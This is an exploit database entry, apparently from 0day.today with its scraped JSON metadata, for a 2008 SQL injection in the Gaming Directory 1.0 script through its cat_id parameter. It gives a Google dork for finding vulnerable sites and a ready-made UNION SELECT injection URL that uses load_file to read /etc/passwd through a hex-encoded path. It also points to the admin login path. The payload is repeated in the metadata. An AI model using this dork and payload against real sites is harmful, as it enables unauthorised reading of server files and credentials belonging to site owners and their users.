ID 1337DAY-ID-2821 Type zdt Reporter t0pP8uZz Modified 2008-04-05T00:00:00
Description
Exploit for unknown platform in category web applications
================================================================
Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability
================================================================
--==+================================================================================+==--
--==+ Gaming Directory 1.0 SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz
Discovered On: 5 April 2008
Google Dork: inurl:"directory.php?ax=list" gaming
DESCRIPTION:
this popular gaming directory script is vulnerable due to insecure mysql querys.
this allows the remote attacker to pull info from the database.
The below Injection uses MYSQL's load_file function, since the admin area password is stored
in a config file we can use load_file to to try and locate it and display the contents of the file.
certain permissons to the running db user is required for this to work. in the load_file below
is a string that has been converted to HEX and if you can read hex then its /etc/passwd so this
should load the /etc/passwd file on most linux distros. Remember certain permissions are needed.
EXPLOITS:
http://site.com/directory.php?ax=list&sub=6&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(0x2F6574632F706173737764),4/**/FROM/**/links/*
NOTE/TIP:
admin login is at /siteadmin/
# 0day.today [2018-02-18] #
{"hash": "d5a024a9a1ebeafa3fd02853862082901226616a2eb6bd641d00424fea7d0e45", "id": "1337DAY-ID-2821", "lastseen": "2018-02-18T03:22:28", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "f7c7848d1d13a5383884be0a6037037c", "key": "href"}, {"hash": "fa38f9aecedbeb0145aad18532329eb3", "key": "modified"}, {"hash": "fa38f9aecedbeb0145aad18532329eb3", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8b2d6218b7569fae764247938febef62", "key": "reporter"}, {"hash": "0eaa81d7b6ca9b0589d3175f2f09df77", "key": "sourceData"}, {"hash": "7b07b376d29c0d1fcc4c635ed554c9bb", "key": "sourceHref"}, {"hash": "1db97821be093a4b3b81ed082623bd02", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/2821", "description": "Exploit for unknown platform in category web applications", "title": "Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "f77f19ea148ffbfc91c1a2b7d80806fbddd03e947e5b2c3b02bebfc234b9002b", "id": "1337DAY-ID-2821", "lastseen": "2016-04-19T23:50:30", "enchantments": {"score": {"value": 6.4, "modified": "2016-04-19T23:50:30"}}, "hashmap": [{"hash": "1db97821be093a4b3b81ed082623bd02", "key": "title"}, {"hash": "8b2d6218b7569fae764247938febef62", "key": "reporter"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "cb26f3c628bf0d1c1fc6f9405270660d", "key": "href"}, {"hash": "2306a8edf3f13181f52890d85b05ecb2", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "fa38f9aecedbeb0145aad18532329eb3", "key": "modified"}, {"hash": "e1ab77e4c1bf60843d1fe6a0018c0239", "key": "sourceData"}, {"hash": "fa38f9aecedbeb0145aad18532329eb3", "key": "published"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/2821", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "================================================================\r\nGaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability\r\n================================================================\r\n\r\n\r\n\r\n--==+================================================================================+==--\r\n--==+\t\t Gaming Directory 1.0 SQL Injection Vulnerbilitys\t +==--\r\n--==+================================================================================+==--\r\n\r\n\r\n\r\nDiscovered By: t0pP8uZz\r\nDiscovered On: 5 April 2008\r\nGoogle Dork: inurl:\"directory.php?ax=list\" gaming\r\n\r\n\r\nDESCRIPTION: \r\nthis popular gaming directory script is vulnerable due to insecure mysql querys.\r\nthis allows the remote attacker to pull info from the database.\r\n\r\nThe below Injection uses MYSQL's load_file function, since the admin area password is stored\r\nin a config file we can use load_file to to try and locate it and display the contents of the file. \r\ncertain permissons to the running db user is required for this to work. in the load_file below\r\nis a string that has been converted to HEX and if you can read hex then its /etc/passwd so this\r\nshould load the /etc/passwd file on most linux distros. Remember certain permissions are needed.\r\n\r\n\r\nEXPLOITS:\r\nhttp://site.com/directory.php?ax=list&sub=6&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(0x2F6574632F706173737764),4/**/FROM/**/links/*\r\n\r\n\r\nNOTE/TIP: \r\nadmin login is at /siteadmin/\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2008-04-05T00:00:00", "references": [], "reporter": "t0pP8uZz", "modified": "2008-04-05T00:00:00", "href": "http://0day.today/exploit/description/2821"}, "lastseen": "2016-04-19T23:50:30", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "================================================================\r\nGaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability\r\n================================================================\r\n\r\n\r\n\r\n--==+================================================================================+==--\r\n--==+\t\t Gaming Directory 1.0 SQL Injection Vulnerbilitys\t +==--\r\n--==+================================================================================+==--\r\n\r\n\r\n\r\nDiscovered By: t0pP8uZz\r\nDiscovered On: 5 April 2008\r\nGoogle Dork: inurl:\"directory.php?ax=list\" gaming\r\n\r\n\r\nDESCRIPTION: \r\nthis popular gaming directory script is vulnerable due to insecure mysql querys.\r\nthis allows the remote attacker to pull info from the database.\r\n\r\nThe below Injection uses MYSQL's load_file function, since the admin area password is stored\r\nin a config file we can use load_file to to try and locate it and display the contents of the file. \r\ncertain permissons to the running db user is required for this to work. in the load_file below\r\nis a string that has been converted to HEX and if you can read hex then its /etc/passwd so this\r\nshould load the /etc/passwd file on most linux distros. Remember certain permissions are needed.\r\n\r\n\r\nEXPLOITS:\r\nhttp://site.com/directory.php?ax=list&sub=6&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(0x2F6574632F706173737764),4/**/FROM/**/links/*\r\n\r\n\r\nNOTE/TIP: \r\nadmin login is at /siteadmin/\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-18] #", "published": "2008-04-05T00:00:00", "references": [], "reporter": "t0pP8uZz", "modified": "2008-04-05T00:00:00", "href": "https://0day.today/exploit/description/2821"}